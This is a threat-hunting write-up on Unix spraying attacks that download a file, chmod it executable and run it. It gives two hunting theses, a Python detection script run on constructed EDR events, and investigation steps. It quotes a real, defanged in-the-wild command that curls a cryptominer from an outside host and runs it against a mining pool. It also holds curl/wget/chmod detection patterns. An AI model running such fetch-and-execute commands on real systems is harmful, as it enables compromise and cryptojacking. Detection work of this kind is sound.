Remote file download followed by granting execution permission

Attack technique

Technique name: Remote file download followed by granting execution permission

MITRE ATT&CK

  • Tactic: Command and Control, Defense Evasion
  • Technique: Ingress Tool Transfer (T1105), File and Directory Permissions Modification (T1222.002)

Technique description
Spraying attacks targeting Unix systems are characterized by a distinct pattern in attacker methodology: the remote download of a malicious file, followed immediately by a permission change that grants execution rights on the downloaded file using chmod. This method is notably employed by threat actors exploiting known (n-day) vulnerabilities, aiming to compromise systems at scale with minimal effort, often using a single command line or just a few.

Insights from threat intelligence
In recent years, there has been a significant rise in the prevalence of spraying attacks targeting Unix systems, particularly those designed for crypto mining and botnet campaigns. These operations are designed to affect large numbers of target systems indiscriminately, without specific regard for the nature of the targets. Such attacks are carried out by threat actors who exploit existing (n-days) vulnerabilities or capitalize on commonly used and weak user passwords over widely accessible protocols like SSH.

In the wild example:

sh -c cd /var/tmp/; curl -s --insecure <http[:]//moneyua[.]vip/dir> -o dir; chmod +x dir; ./dir -a minotaurx -o stratum+tcps[:]//stratum-eu.rplant[.]xyz:17063 -u MKkb4o9jUYmcQRRkpJWK82mW2S1ZZMtaLg.jajal -p password=jancok --no-longpoll -q --randomize --background > /dev/null

Threat hunting theses breakdown

Thesis 1: Remote file download followed by granting execution permission on the same command line

Relevant data sources: EDR Telemetry Logs

Thesis explanation
The thesis looks for spraying attacks which are characterized by the usage of built-in remote downloading utilities (such as curl, wget), chmod execution permission of the downloaded file, and execution of the file afterward on the same command line.

Blind spots

  • The attacker executes the commands separately, and not in a single command.
  • Unknown remote downloading utility that isn't curl or wget (less likely, given threat actors mostly utilize generic binaries that already exist on the system).

Thesis 2: Remote file download followed by granting execution permission based on time interval

Relevant data sources: EDR Telemetry Logs

Thesis explanation
The thesis looks for spraying attacks which are characterized by the usage of built-in remote downloading utilities (such as curl, wget), chmod execution permission of the downloaded file, and execution of the file afterward on separate command lines within a 5-minute interval.

Blind spots

  • The attacker executes the commands separately over more than 5 minutes.
  • Unknown remote downloading utility that isn't curl or wget (less likely, given threat actors mostly utilize generic binaries that already exist on the system).
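Detection logic for both theses, as an added example that is not part of the original hunting package: it splits EDR command lines on shell separators, recognises the curl/wget output file and a chmod that grants execute, and correlates the three steps either within one command line (Thesis 1) or across a host's separate events within a 5-minute window (Thesis 2). The event records, host names and URLs are constructed; the regexes, the flag set they recognise, and the reading of the interval as "each step within 5 minutes of the previous one" are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample EDR process events (host, ISO timestamp, command line); not real telemetry.
EVENTS = [
    ("web01", "2024-05-01T10:00:00", "sh -c cd /var/tmp/; curl -s --insecure http://dl.example.invalid/dir -o dir; chmod +x dir; ./dir --background"),
    ("web02", "2024-05-01T10:05:00", "wget -q http://dl.example.invalid/x86 -O /tmp/x86"),
    ("web02", "2024-05-01T10:07:10", "chmod 755 /tmp/x86"),
    ("web02", "2024-05-01T10:07:12", "/tmp/x86 -c /tmp/conf"),
    ("db01", "2024-05-01T11:00:00", "curl -sS https://repo.example.invalid/pkg -o /tmp/pkg"),
    ("db01", "2024-05-01T11:30:00", "chmod +x /tmp/pkg"),  # 30 min after the download: Thesis 2 blind spot
    ("db01", "2024-05-01T11:30:05", "/tmp/pkg"),
]

SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # shell command separators
DOWNLOAD_RE = re.compile(r"^(?:curl|wget)\b.*?(?:-o|-O|--output(?:-document)?)[ =](\S+)")  # output file (assumed flag set)
CHMOD_RE = re.compile(r"^chmod\s+(?:[ugoa]*\+[rw]*x|[0-7]{3,4})\s+(\S+)")  # execute via symbolic (+x) or octal (755) mode
_name = lambda p: p.rsplit("/", 1)[-1]  # path -> bare file name, so ./dir and /tmp/dir refer to the same file

def classify(segment):
    """Map one shell segment to ('download'|'chmod'|'exec', file name)."""
    if m := DOWNLOAD_RE.match(segment): return "download", _name(m.group(1))
    if m := CHMOD_RE.match(segment): return "chmod", _name(m.group(1))
    return "exec", _name((segment.split() or [""])[0])  # otherwise the first token is the program run

def thesis1(cmdline):
    """Thesis 1: download, chmod and execution of the same file in one command line."""
    seen = {}
    for seg in SPLIT_RE.split(cmdline):
        kind, name = classify(seg)
        if kind == "download":
            seen.setdefault(name, set()).add("download")
        elif name in seen:
            seen[name].add(kind)
    return [n for n, k in seen.items() if k == {"download", "chmod", "exec"}]

def thesis2(events, window=timedelta(minutes=5)):
    """Thesis 2: the chain split over separate command lines on one host, each step at most `window` after the previous."""
    stage, hits = {}, []  # stage: (host, file) -> (last stage reached, time it was reached)
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        if thesis1(cmd): continue  # single-line chains are Thesis 1's job
        t = datetime.fromisoformat(ts)
        for seg in SPLIT_RE.split(cmd):
            kind, name = classify(seg)
            key, prev = (host, name), stage.get((host, name))
            if kind == "download": stage[key] = ("download", t)
            elif prev and t - prev[1] <= window:
                if kind == "chmod" and prev[0] == "download": stage[key] = ("chmod", t)
                elif kind == "exec" and prev[0] == "chmod": hits.append((host, name, ts))
    return hits
```

On the constructed events, web01 fires Thesis 1, web02 fires Thesis 2, and db01 fires neither because its chmod came 30 minutes after the download (blind spot 1 of Thesis 2).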

Recommended investigation flow

  • Investigate the remote download domain / URL that has been used in the commandline
    • Domain:
      • Is it in Umbrella 1M?
      • Is it a baby domain (registered recently)?
      • Which registrar registered it?
      • Does it have a valid certificate?
      • Does the whois information reveal the organization that owns the domain?
      • When was it first accessed by the organization?
      • How frequently is it accessed by the organization?
    • IP:
      • Which ASN does it belong to?
      • Is it hosting?
      • Is it a proxy IP?
      • When was it first accessed by the organization?
      • How frequently is it accessed by the organization?
  • Investigate the target file that has been executed
    • Investigate suspicious child processes
    • Investigate suspicious files it has written to the disk
  • Investigate the origin of the command line(s) execution
    • Investigate the parent process of the executed command line(s) to understand the origin of the execution; sometimes it points to which vulnerability has been exploited.
    • Pivot and investigate other executions made by the same parent process.

Hunting queries

GitHub